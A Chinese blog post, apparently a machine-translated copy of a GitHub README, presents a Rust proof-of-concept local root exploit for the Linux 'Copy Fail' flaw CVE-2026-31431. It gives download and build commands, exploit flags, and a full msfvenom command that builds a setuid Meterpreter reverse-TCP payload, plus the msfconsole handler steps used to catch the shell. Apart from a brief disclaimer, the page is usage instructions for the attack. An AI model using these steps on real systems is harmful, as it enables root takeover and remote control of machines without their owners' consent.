跳至正文
大神K

编程技术 / Web开发 / AI学习笔记

大神K

编程技术 / Web开发 / AI学习笔记

  • 首页
  • AI
  • 运维
  • 漏洞
  • 安全
  • 逆向
  • 工具
  • 资源
    • 科学上网
  • 资讯
  • 🛒大神商城
  • ✨ 项目展示
  • 👋 关于我
  • 首页
  • AI
  • 运维
  • 漏洞
  • 安全
  • 逆向
  • 工具
  • 资源
    • 科学上网
  • 资讯
  • 🛒大神商城
  • ✨ 项目展示
  • 👋 关于我
关

搜索

大神K

编程技术 / Web开发 / AI学习笔记

大神K

编程技术 / Web开发 / AI学习笔记

  • 首页
  • AI
  • 运维
  • 漏洞
  • 安全
  • 逆向
  • 工具
  • 资源
    • 科学上网
  • 资讯
  • 🛒大神商城
  • ✨ 项目展示
  • 👋 关于我
  • 首页
  • AI
  • 运维
  • 漏洞
  • 安全
  • 逆向
  • 工具
  • 资源
    • 科学上网
  • 资讯
  • 🛒大神商城
  • ✨ 项目展示
  • 👋 关于我
关

搜索

家/漏洞与安全研究/Rust 实现的 CVE-2026-31431-Linux-Copy-Fail 漏洞 PoC,允许执行自定义的 shellcode(如 Meterpreter)。
漏洞与安全研究

Rust 实现的 CVE-2026-31431-Linux-Copy-Fail 漏洞 PoC,允许执行自定义的 shellcode(如 Meterpreter)。

作者 大神K
2026年5月1日 1 分钟阅读
0

仓库文件导航

Rust 实现的本地权限升级漏洞利用,适用于 CVE-2026-31431(复制失败)。

它允许执行自定义的shellcode(例如 Meterpreter ))

简介

Xint披露了CVE-2026-31431,这是一种任意的页面缓存写入漏洞,用于实现4字节写原语。 AF_ALG splice()

来源: Copy fail:每个主要Linux发行版的root节点为732字节

免责声明

这个项目是我个人对网络安全研究兴趣的一部分。然而,它也可能被恶意滥用。

请勿使用此工具进行任何非法活动。

作者对本软件的任何滥用不承担任何责任。

致谢

  • theori-io/copy-fail-CVE-2026-31431

注:原作使用压缩/编码的壳码(例如 )。在这个实现中,我用一个原始(未压缩)的shellcode来替代它,方便自定义或直接替换用户提供的载荷。 /bin/sh /bin/bash

编译方法

克隆该项目,然后执行: build.sh

git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

用途

下载并解压发布包:

wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

以下二进制提供了以下选项:

./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

演示

测试漏洞

关于易受攻击的机器:

./CVE-2026-31431-Linux-Copy-Fail --test

开发

./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

Use the command (set PrependSetUid to ) below to generate Meterpreter payload:True

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

On the attacker machine (Kali Linux):

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

On the vulnerable machine:

./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin


Affected Versions

  • Ubuntu
  • Redhat

发行作品1

套餐

没有发布任何软件包

语言

  • 锈蚀 91.0%
  • 壳牌 9.0%
📌 版权声明

文章作者:大神K

原文链接:https://dashenk.com/2026/05/01/rust-%e5%ae%9e%e7%8e%b0%e7%9a%84-cve-2026-31431-linux-copy-fail-%e6%bc%8f%e6%b4%9e-poc%ef%bc%8c%e5%85%81%e8%ae%b8%e6%89%a7%e8%a1%8c%e8%87%aa%e5%ae%9a%e4%b9%89%e7%9a%84-shellcode%ef%bc%88%e5%a6%82-mete/

版权说明:本文为原创内容,转载请注明出处。

标签:

CopyFailCVELinuxMeterpreterPOCshellcode本地提权
作者

大神K

我是一个长期在技术与赚钱之间反复横跳的人。 做过网站、搞过SEO、写过程序,也踩过币圈的坑。 现在在做的事情很简单: 用 AI + 技术,把复杂的事情变简单,把一个人变成一支队伍。 这个网站,不是教程站,而是我的「操作记录」。 一个站长如何做 SEO 和流量 一个开发者如何用 AI 提高效率 一个交易者如何系统性构建赚钱模型 只讲能落地的方案,分享: 真实经验 + 踩过的坑 在这个时代,一个人,也可以是一家公司。

关注我
其他文章
上一个

CVE-2026-31431(Copy Fail)本地提权漏洞影响太大了,影响 2017 年至今几乎所有 Linux 发行版

下一个

苹果IOS的推送出问题了 刚解决

暂无评论!成为第一个。

发表回复 取消回复

您的邮箱地址不会被公开。 必填项已用 * 标注

广告 × 广告
广告 × 广告
广告 × 广告
广告 × 广告

Agent AI利用 AI变现 AI大模型 AI工具 API中转站 ChatGPT Claude Cloudflare CVE Epusdt Gemma4 GEO技术 GitHub GPT GPT-Image-2 Hermes Image-2 Linux MacOS系统 OpenClaw POC RackNerd Skills VPS Windows WordPress 下载利器 两性 免费工具 免费模型 大龙虾 小红书 工具使用 开源免费 提示词 搭建 教学 教程 本地运行 梯子 漏洞 爬虫工具 社工库 资源下载

大神K
🚀 AI工具|建站教程|副业变现
用技术改变收入结构
免费获取AI工具合集 →
© 2026 大神K · AI Tools & Growth System